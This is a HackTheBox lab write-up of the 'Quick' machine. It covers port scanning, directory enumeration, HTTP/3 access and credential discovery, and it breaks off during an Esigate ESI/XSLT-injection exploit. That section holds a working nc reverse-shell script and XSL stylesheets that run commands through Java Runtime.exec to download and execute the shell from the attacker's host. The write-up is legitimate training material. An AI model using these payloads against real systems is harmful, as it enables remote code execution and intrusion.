<!DOCTYPE html><html lang="en" mode="dark" > <!-- The Head v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title>Quick | yassine</title><meta name="generator" content="Jekyll v3.8.6" /><meta property="og:title" content="Quick" /><meta name="author" content="Mohammad YASSINE" /><meta property="og:locale" content="en_US" /><meta name="description" content="Quick from HackTheBox" /><meta property="og:description" content="Quick from HackTheBox" /><link rel="canonical" href="https://0xyassine.github.io//posts/Quick/" /><meta property="og:url" content="https://0xyassine.github.io//posts/Quick/" /><meta property="og:site_name" content="yassine" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2020-05-09T00:00:00+03:00" /><meta name="google-site-verification" content="google_meta_tag_verification" /> <script type="application/ld+json"> {"url":"https://0xyassine.github.io//posts/Quick/","@type":"BlogPosting","headline":"Quick","dateModified":"2020-05-09T00:00:00+03:00","datePublished":"2020-05-09T00:00:00+03:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://0xyassine.github.io//posts/Quick/"},"author":{"@type":"Person","name":"Mohammad YASSINE"},"description":"Quick from HackTheBox","@context":"https://schema.org"}</script> <!-- The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps Generated by: https://www.favicon-generator.org/ v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2019 Cotes Chung Published under the MIT license --><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="icon" href="/assets/img/favicons/favicon.ico" type="image/x-icon"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon.png"><link rel="apple-touch-icon" href="/assets/img/favicons/apple-icon-precomposed.png"><link rel="apple-touch-icon" sizes="57x57" href="/assets/img/favicons/apple-icon-57x57.png"><link rel="apple-touch-icon" sizes="60x60" href="/assets/img/favicons/apple-icon-60x60.png"><link rel="apple-touch-icon" sizes="72x72" href="/assets/img/favicons/apple-icon-72x72.png"><link rel="apple-touch-icon" sizes="76x76" href="/assets/img/favicons/apple-icon-76x76.png"><link rel="apple-touch-icon" sizes="114x114" href="/assets/img/favicons/apple-icon-114x114.png"><link rel="apple-touch-icon" sizes="120x120" href="/assets/img/favicons/apple-icon-120x120.png"><link rel="apple-touch-icon" sizes="144x144" href="/assets/img/favicons/apple-icon-144x144.png"><link rel="apple-touch-icon" sizes="152x152" href="/assets/img/favicons/apple-icon-152x152.png"><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-icon-180x180.png"><link rel="icon" type="image/png" sizes="192x192" href="/assets/img/favicons/android-icon-192x192.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="96x96" href="/assets/img/favicons/favicon-96x96.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/manifest.json"><meta name='msapplication-config' content='/assets/img/favicons/browserconfig.xml'><meta name="msapplication-TileColor" content="#ffffff"><meta name="msapplication-TileImage" content="/assets/img/favicons/ms-icon-144x144.png"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin="anonymous"><link rel="dns-prefetch" href="https://fonts.gstatic.com"><link rel="preconnect" href="cdn.jsdelivr.net"><link rel="dns-prefetch" href="cdn.jsdelivr.net"><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin><link rel="preload" as="style" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="preload" as="style" href="/assets/css/main.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/css/bootstrap.min.css" integrity="sha256-LA89z+k9fjgMKQ/kq4OO2Mrf8VltYml/VES+Rg0fh20=" crossorigin="anonymous"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css" integrity="sha256-+N4/V/SbAFiW1MPBCXnfnP9QSN3+Keu+NlB+0ev/YKQ=" crossorigin="anonymous"><link rel="stylesheet" href="/assets/css/main.css"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"><link rel="preload" as="script" href="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin> <script src="https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js" integrity="sha256-CSXorXvZcTkaix6Yvo6HppcZGetbYMGWSFlBw8HfCJo=" crossorigin="anonymous"></script> <script> window.jQuery || document.write('<script src="/assets/lib/jquery-3.4.1.min.js"><\/script>'); </script> <script src="https://cdn.jsdelivr.net/npm/popper.js@1.15.0/dist/umd/popper.min.js" integrity="sha256-fTuUgtT7O2rqoImwjrhDgbXTKUwyxxujIMRIK7TbuNU=" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.0.0/dist/js/bootstrap.min.js" integrity="sha256-5+02zu5UULQkO7w1GIr6vftCgMfFdZcAHeDtFnKZsBs=" crossorigin="anonymous" async></script> <script src="/assets/js/dist/commons.js" async></script> <script src="/assets/js/dist/timeago.min.js" async></script><link rel="preload" as="style" href="/assets/css/post.css"><link rel="preload" as="style" href="/assets/css/syntax.css"><link rel="stylesheet" href="/assets/css/post.css"><link rel="stylesheet" href="/assets/css/syntax.css"><link rel="preload" as="style" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css"><link rel="preload" as="script" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js"><link rel="stylesheet" href="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.css" /> <script src="/assets/lib/bootstrap-toc-1.0.1/bootstrap-toc.min.js" async></script> <script src="/assets/js/dist/toc.min.js" async></script> <script src="/assets/js/dist/tooltip-loader.min.js" async></script><body data-spy="scroll" data-target="#toc"><div id="sidebar" class="d-flex flex-column"> <!-- The Side Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="nav-wrapper"><div id="profile-wrapper" class="d-flex flex-column"><div id="avatar" class="d-flex justify-content-center"> <a href="/" alt="avatar"> <img src="/assets/img/sample/avatar.jpg" alt="avatar"> </a></div><div class="profile-text mt-3"><div id="site-title"> <a href="/">yassine</a></div><div id="site-subtitle" class="font-italic">Pentester | CyberSec analyst .</div></div></div><ul class="nav flex-column"><li class="nav-item d-flex justify-content-center "> <a href="/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-home ml-3 mr-3 unloaded"></i> <span>HOME</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/categories/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-stream ml-3 mr-3 unloaded"></i> <span>CATEGORIES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/tags/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-tags ml-3 mr-3 unloaded"></i> <span>TAGS</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/archives/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-archive ml-3 mr-3 unloaded"></i> <span>ARCHIVES</span> </a></li><li class="nav-item d-flex justify-content-center "> <a href="/tabs/about/" class="nav-link d-flex justify-content-center align-items-center w-100"> <i class="fa-fw fas fa-info ml-3 mr-3 unloaded"></i> <span>ABOUT</span> </a></li></ul></div><div class="sidebar-bottom d-flex flex-wrap justify-content-around mt-4"> <a href="https://www.facebook.com/mouhamed.yassin.90" target="_blank"> <i class="fab fa-facebook-alt"><b><font color="orange">F</font></b></i> </a> <a href="https://www.linkedin.com/in/mohammad-yassine-8b84041a5/" target="_blank"> <i class="fab fa-linked-alt"><b><font color="orange">L</font></b></i> </a> <a href="https://www.hackthebox.eu/home/users/profile/143843" target="_blank"> <i class="fab fa-linked-alt"><b><font color="orange">H</font></b></i> </a></div></div><!-- The Top Bar v2.0 https://github.com/cotes2020/jekyll-theme-chirpy © 2017-2019 Cotes Chung MIT License --><div id="topbar-wrapper" class="row justify-content-center topbar-down"><div id="topbar" class="col-11 d-flex h-100 align-items-center justify-content-between"> <span id="breadcrumb"> <span> <a href="/"> Posts </a> </span> <span>Quick</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" placeholder="Search..."> <i class="fa fa-times-circle fa-fw" id="search-cleaner"></i> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper"><div id="main"> <!-- Fixed kramdown code highlight rendering: https://github.com/penibelst/jekyll-compress-html/issues/101 https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901 --><div class="row"><div id="post-wrapper" class="col-12 col-lg-11 col-xl-8"><div class="post pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><h1 data-toc-skip>Quick</h1><div class="post-meta text-muted d-flex flex-column"><div> Posted <span class="timeago" data-toggle="tooltip" data-placement="bottom" title="Sat, May 9, 2020, 12:00 AM +0300"> May 9, 2020 <i class="unloaded">2020-05-09T00:00:00+03:00</i> </span> by <span class="author"> Mohammad YASSINE </span></div><div> Updated <span class="timeago lastmod" data-toggle="tooltip" data-placement="bottom" title="Sun, May 31, 2020, 6:05 PM +0300"> May 31, 2020 <i class="unloaded">2020-05-31T18:05:38+03:00</i> </span></div></div><div class="post-content"><h1 id="quick-from-hackthebox">Quick from HackTheBox</h1><p><br /></p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/info.jpg" alt="info" /></p><p><br /> Very good box with new attack vector and techniques so let’s start<br /></p><blockquote><p>Note: add 10.10.10.186 to your host file as quick.htb to use it instead of the ip</p></blockquote><h2 id="nmap-scan">nmap scan</h2><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap -sV -sC quick.htb -v
</pre></table></code></div></div><div class="language-terminal highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="go">PORT     STATE SERVICE VERSION
</span><span class="gp">22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;</span><span class="w"> </span>protocol 2.0<span class="o">)</span>
<span class="go">| ssh-hostkey: 
|   2048 fb:b0:61:82:39:50:4b:21:a8:62:98:4c:9c:38:82:70 (RSA)
|   256 ee:bb:4b:72:63:17:10:ee:08:ff:e5:86:71:fe:8f:80 (ECDSA)
|_  256 80:a6:c2:73:41:f0:35:4e:5f:61:a7:6a:50:ea:b8:2e (ED25519)
9001/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Quick | Broadband Services
</span><span class="gp">Service Info: OS: Linux;</span><span class="w"> </span>CPE: cpe:/o:linux:linux_kernel
</pre></table></code></div></div><p><code class="highlighter-rouge">9001</code> is a web port so let’s check it at the first time …<br /></p><h2 id="web-enum">Web enum</h2><p>visit: <code class="highlighter-rouge">http://quick.htb:9001/</code><br /></p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/page.jpg" alt="info" /> useful info:<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>Super fast services by Quick Broadband Services. I love their service.  --By Tim (Qconsulting Pvt Ltd)

Quick support and eligant chat response.  --By Roy (DarkWng Solutions)

I never regret using Quick services. Super fast wifi and no issues. --By Elisa (Wink Media)

Very good delivery and support all these years. --By James (LazyCoop Pvt Ltd)
</pre></table></code></div></div><p>Let’s enumerate more with <code class="highlighter-rouge">gobuster</code><br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php,asp,aspx -u http://quick.htb:9001/ 
</pre></table></code></div></div><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
</pre><td class="rouge-code"><pre>===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://quick.htb:9001/
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,asp,aspx,txt,html
[+] Timeout:        10s
===============================================================
2020/05/05 15:25:48 Starting gobuster
===============================================================
/index.php (Status: 200)
/home.php (Status: 200)
/search.php (Status: 200)
/login.php (Status: 200)
/clients.php (Status: 200)
/db.php (Status: 200)
===============================================================
2020/05/05 15:26:37 Finished
===============================================================
</pre></table></code></div></div><p>clients page: <code class="highlighter-rouge">http://quick.htb:9001/clients.php</code> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/clients.jpg" alt="info" /> those are organisation names …<br /> <code class="highlighter-rouge">login</code> page:<br /> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/login.jpg" alt="info" /></p><p>i tried <code class="highlighter-rouge">auth bypass</code> and other <code class="highlighter-rouge">sql injection</code> techniques but not working so i need to find login creds …<br /> the <code class="highlighter-rouge">db.php</code> should be useful in the future. if you click on <code class="highlighter-rouge">portal</code> , a new page appear: <code class="highlighter-rouge">https://portal.quick.htb/</code> but with error.<br /></p><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/ssl.jpg" alt="info" /></p><p>look like ssl problem.<br /> the <code class="highlighter-rouge">portal</code> website is working on port <code class="highlighter-rouge">443</code> but this port is not showing up in nmap scan so i decided to run <code class="highlighter-rouge">UDP</code> nmap scan<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>nmap -sU -v quick.htb
</pre></table></code></div></div><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre>Host is up (0.082s latency).

PORT    STATE         SERVICE
443/udp open|filtered https

Read data files from: /usr/bin/../share/nmap
</pre></table></code></div></div><p>so the <code class="highlighter-rouge">443</code> is a <code class="highlighter-rouge">https udp</code> port , after searching for this udp https port , i found that it’s <code class="highlighter-rouge">HTTP/3</code> protocol.<br /> searching for how to interact with <code class="highlighter-rouge">HTTP/3</code> protocol , i found a <a href="https://hub.docker.com/r/ymuski/curl-http3">curl</a> version that support this protocol <br /></p><h2 id="curl-setup">curl setup</h2><p>i need to use docker , so if you don’t have docker installed , just run <code class="highlighter-rouge">apt install docker.io</code><br /> start docker service</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>service docker start
</pre></table></code></div></div><p>start pulling the image</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>docker pull ymuski/curl-http3
</pre></table></code></div></div><p>now i can run curl :</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>docker run -it --rm ymuski/curl-http3 curl -V
</pre></table></code></div></div><p>it works :)<br /> Let’s try it to get the content of the portal page</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>docker run -it --rm ymuski/curl-http3 curl --http3 https://quick.htb --ssl
</pre></table></code></div></div><p>i got</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>&lt;li&gt;&lt;a href="index.php"&gt;Home&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="index.php?view=contact"&gt;Contact&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="index.php?view=about"&gt;About&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="index.php?view=docs"&gt;References&lt;/a&gt;&lt;/li
</pre></table></code></div></div><p>update the url to get the content of <code class="highlighter-rouge">docs</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>docker run -it --rm ymuski/curl-http3 curl --http3 https://quick.htb/index.php?view=docs --ssl
</pre></table></code></div></div><p>result:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
</pre><td class="rouge-code"><pre><span class="cp">&lt;!DOCTYPE html&gt;</span>
<span class="nt">&lt;html&gt;</span>
<span class="nt">&lt;head&gt;</span>
<span class="nt">&lt;meta</span> <span class="na">name=</span><span class="s">"viewport"</span> <span class="na">content=</span><span class="s">"width=device-width, initial-scale=1"</span><span class="nt">&gt;</span>

<span class="nt">&lt;h1&gt;</span>Quick | References<span class="nt">&lt;/h1&gt;</span>
<span class="nt">&lt;ul&gt;</span>
  <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"docs/QuickStart.pdf"</span><span class="nt">&gt;</span>Quick-Start Guide<span class="nt">&lt;/a&gt;&lt;/li&gt;</span>
  <span class="nt">&lt;li&gt;&lt;a</span> <span class="na">href=</span><span class="s">"docs/Connectivity.pdf"</span><span class="nt">&gt;</span>Connectivity Guide<span class="nt">&lt;/a&gt;&lt;/li&gt;</span>
<span class="nt">&lt;/ul&gt;</span>
<span class="nt">&lt;/head&gt;</span>
<span class="nt">&lt;/html&gt;</span>
</pre></table></code></div></div><p>the <code class="highlighter-rouge">Connectivity.pdf</code> seem interesting ,i tried getting it using <code class="highlighter-rouge">docker run -it --rm ymuski/curl-http3 curl --http3 https://quick.htb/docs/Connectivity.pdf -o onnect.pdf</code> but not working for me , so i searched for <code class="highlighter-rouge">HTTP/3</code> client and found a useful <a href="https://developers.cloudflare.com/http3/intro/http3-client">article</a><br /> just setup the <code class="highlighter-rouge">quiche</code> client and run the following command to get the <code class="highlighter-rouge">pdf</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>RUST_LOG="info" ./http3-client https://quick.htb/docs/Connectivity.pdf &gt; Connectivity.pdf
</pre></table></code></div></div><p><img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/creds.jpg" alt="info" /> got a password : <code class="highlighter-rouge">Quick4cc3$$</code> but what about <code class="highlighter-rouge">email</code> ? this was the <code class="highlighter-rouge">CTF</code> part of the box …<br /></p><p>By going back to the <code class="highlighter-rouge">Web Enum</code> part ,you can see a set of usernames ,organisation and country codes.<br /> After combining them together and trying to login , i was able to login with <code class="highlighter-rouge">elisa@wink.co.uk</code> <br /> <img class="lozad" src= /assets/img/commons/loading.png data-src="https://raw.githubusercontent.com/0xyassine/0xyassine.github.io/master/assets/img/htb/quick/after.jpg" alt="info" /></p><h2 id="exploiting-esigate-with-xslt-injection">Exploiting Esigate with XSLT-Injection</h2><p>go to <code class="highlighter-rouge">ticket.php</code> and intercept the post request with <code class="highlighter-rouge">burp</code><br /> Request:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre><td class="rouge-code"><pre>POST /ticket.php HTTP/1.1
Host: quick.htb:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://quick.htb:9001/ticket.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Connection: close
Cookie: PHPSESSID=42p7fc3ho6b5aklgf9ld77hm2r
Upgrade-Insecure-Requests: 1

title=test&amp;msg=test&amp;id=TKT-8536
</pre></table></code></div></div><p>response:</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
</pre><td class="rouge-code"><pre>HTTP/1.1 200 OK
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Via: 1.1 localhost (Apache-HttpClient/4.5.2 (cache))
X-Powered-By: Esigate
Content-Length: 102
Connection: close

&lt;script&gt;alert("This ticket exists. Please raise new one");window.location.href="/ticket.php";&lt;/script&gt;
</pre></table></code></div></div><p>i see that <code class="highlighter-rouge">X-Powered-By: Esigate</code> is interesting<br /> I searched for <code class="highlighter-rouge">Esigate exploit</code> and i got a useful <a href="https://www.gosecure.net/blog/2019/05/02/esi-injection-part-2-abusing-specific-implementations/">acticle</a><br /> According to the exploit , i need to use a <code class="highlighter-rouge">esi</code> tag pointed to <code class="highlighter-rouge">.xsl</code> file hosted in my local machine. I created two <code class="highlighter-rouge">.xsl</code> files , one to upload my shell to the box and the other to excute it.<br /> First of all, create a file called <code class="highlighter-rouge">shell.sh</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="c">#!/bin/bash</span>
<span class="nb">rm</span> /tmp/f<span class="p">;</span><span class="nb">mkfifo</span> /tmp/f<span class="p">;</span><span class="nb">cat</span> /tmp/f|/bin/sh <span class="nt">-i</span> 2&gt;&amp;1|nc 10.10.16.81 4444 <span class="o">&gt;</span>/tmp/f
</pre></table></code></div></div><p>now creat a file called <code class="highlighter-rouge">upload.xsl</code> that use <code class="highlighter-rouge">wget</code> to upload this shell to the box<br /></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre><span class="cp">&lt;?xml version="1.0" ?&gt;</span>
<span class="nt">&lt;xsl:stylesheet</span> <span class="na">version=</span><span class="s">"1.0"</span> <span class="na">xmlns:xsl=</span><span class="s">"http://www.w3.org/1999/XSL/Transform"</span><span class="nt">&gt;</span>
<span class="nt">&lt;xsl:output</span> <span class="na">method=</span><span class="s">"xml"</span> <span class="na">omit-xml-declaration=</span><span class="s">"yes"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;xsl:template</span> <span class="na">match=</span><span class="s">"/"</span>
<span class="na">xmlns:xsl=</span><span class="s">"http://www.w3.org/1999/XSL/Transform"</span>
<span class="na">xmlns:rt=</span><span class="s">"http://xml.apache.org/xalan/java/java.lang.Runtime"</span><span class="nt">&gt;</span>
<span class="nt">&lt;root&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"cmd"</span><span class="nt">&gt;</span><span class="cp">&lt;![CDATA[wget http://10.10.16.81/shell.sh]]&gt;</span><span class="nt">&lt;/xsl:variable&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"rtObj"</span> <span class="na">select=</span><span class="s">"rt:getRuntime()"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"process"</span> <span class="na">select=</span><span class="s">"rt:exec($rtObj, $cmd)"</span><span class="nt">/&gt;</span>
Process: <span class="nt">&lt;xsl:value-of</span> <span class="na">select=</span><span class="s">"$process"</span><span class="nt">/&gt;</span>
Command: <span class="nt">&lt;xsl:value-of</span> <span class="na">select=</span><span class="s">"$cmd"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;/root&gt;</span>
<span class="nt">&lt;/xsl:template&gt;</span>
<span class="nt">&lt;/xsl:stylesheet&gt;</span>
</pre></table></code></div></div><p>and other one to run the <code class="highlighter-rouge">shell.sh</code>,let’s name it <code class="highlighter-rouge">shell.xsl</code></p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre><span class="cp">&lt;?xml version="1.0" ?&gt;</span>
<span class="nt">&lt;xsl:stylesheet</span> <span class="na">version=</span><span class="s">"1.0"</span> <span class="na">xmlns:xsl=</span><span class="s">"http://www.w3.org/1999/XSL/Transform"</span><span class="nt">&gt;</span>
<span class="nt">&lt;xsl:output</span> <span class="na">method=</span><span class="s">"xml"</span> <span class="na">omit-xml-declaration=</span><span class="s">"yes"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;xsl:template</span> <span class="na">match=</span><span class="s">"/"</span>
<span class="na">xmlns:xsl=</span><span class="s">"http://www.w3.org/1999/XSL/Transform"</span>
<span class="na">xmlns:rt=</span><span class="s">"http://xml.apache.org/xalan/java/java.lang.Runtime"</span><span class="nt">&gt;</span>
<span class="nt">&lt;root&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"cmd"</span><span class="nt">&gt;</span><span class="cp">&lt;![CDATA[bash shell.sh]]&gt;</span><span class="nt">&lt;/xsl:variable&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"rtObj"</span> <span class="na">select=</span><span class="s">"rt:getRuntime()"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;xsl:variable</span> <span class="na">name=</span><span class="s">"process"</span> <span class="na">select=</span><span class="s">"rt:exec($rtObj, $cmd)"</span><span class="nt">/&gt;</span>
Process: <span class="nt">&lt;xsl:value-of</span> <span class="na">select=</span><span class="s">"$process"</span><span class="nt">/&gt;</span>
Command: <span class="nt">&lt;xsl:value-of</span> <span class="na">select=</span><span class="s">"$cmd"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;/root&gt;</span>
<span class="nt">&lt;/xsl:template&gt;</span>
<span class="nt">&lt;/xsl:stylesheet&gt;</span>
</pre></table></code></div></div><p>Now host those three files in you server by running a php webserver</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre>php -S 10.10.16.81:80
</pre></table></code></div></div><p>to excute the exploit just send <code class="highlighter-rouge">&lt;esi:include src="http://10.10.10.186:9001/home.php" stylesheet="http://10.10.16.81:80/upload.xsl"&gt;&lt;/esi:include&gt;</code> with burp in the <code class="highlighter-rouge">id</code> field</p><div class="highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>POST /ticket.php HTTP/1.1
Host: quick.htb:9001
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://quick.htb:9001/ticket.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Connection: close
Cookie: PHPSESSID=42p7fc3ho6b5aklgf9ld77hm2r
Upgrade-Insecure-Requests: 1

title=test&amp;msg=test&amp;id=&lt;esi:include src="http://10.10.10.186:9001/home.php"
stylesheet="http://10.10.16.81:80/upload.xsl"&gt;&lt;/esi:include&gt;
